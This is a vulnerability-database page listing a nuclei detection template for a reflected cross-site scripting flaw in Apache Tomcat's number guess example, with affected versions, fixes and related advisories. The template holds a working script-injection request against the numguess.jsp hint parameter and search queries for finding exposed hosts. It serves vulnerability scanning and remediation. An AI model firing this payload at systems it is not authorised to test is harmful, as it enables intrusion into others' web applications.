Lucene search
K

Apache Tomcat - Cross-Site Scripting

🗓️ 15 Jul 2026 04:32:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Apache Tomcat suffers cross-site scripting in the number guess example; upgrade to fixed versions.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Basic XSS in Apache Tomcat
8 Jul 202608:56
githubexploit
ATTACKERKB
CVE-2026-50229
29 Jun 202620:36
attackerkb
Circl
CVE-2026-50229
29 Jun 202621:40
circl
CVE
CVE-2026-50229
29 Jun 202620:36
cve
Cvelist
CVE-2026-50229 Apache Tomcat: XSS in number guess example
29 Jun 202620:36
cvelist
Debian CVE
CVE-2026-50229
29 Jun 202620:36
debiancve
EUVD
EUVD-2026-40226
29 Jun 202620:36
euvd
F5 Networks
K000162210: Multiple Apache Tomcat vulnerabilities
13 Jul 202609:11
f5
Kaspersky
KLA91122 Multiple vulnerabilities in Apache Tomcat
23 Jun 202600:00
kaspersky
NVD
CVE-2026-50229
29 Jun 202621:16
nvd
Rows per page
id: CVE-2026-50229

info:
  name: Apache Tomcat - Cross-Site Scripting
  author: yshahinzadeh,amirmsafari
  severity: medium
  description: |
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in the number guess example for Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.22, from 10.1.0-M1 through 10.1.55, from 9.0.0.M1 through 9.0.118, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Other versions that have reached end of support may also be affected. Users are recommended to upgrade to version 11.0.23, 10.1.56 or 9.0.119, which fix the issue.
  impact: |
    Remote attackers can execute scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.
  remediation: |
    Upgrade to versions 11.0.23, 10.1.56, or 9.0.119 or later.
  reference:
    - https://lists.apache.org/thread/wlt2no8bw45zl1w8byop4zfqphldf5j0
    - https://www.cve.org/CVERecord?id=CVE-2026-50229
    - https://tomcat.apache.org/security-11.html
    - https://www.herodevs.com/vulnerability-directory/cve-2026-50229
  classification:
    cwe-id: CWE-80
    cve-id: CVE-2026-50229
    epss-score: 0.00455
    epss-percentile: 0.36582
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: tomcat
    shodan-query: html:"Apache Tomcat"
    fofa-query: app="APACHE-Tomcat"
  tags: cve,cve2026,apache,tomcat,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/examples/jsp/num/numguess.jsp?guess=5&hint=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'Number Guess'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ed0338f78ebefb118ef2e51c90f073c1b840935d4df4013c68e208b94cccefc4022100b309c97ed19ef08a67327fd1559cd7fd43ec79adb6677dd5df11168f3e0aac07:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 09:21Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1
EPSS0.00455
SSVC
3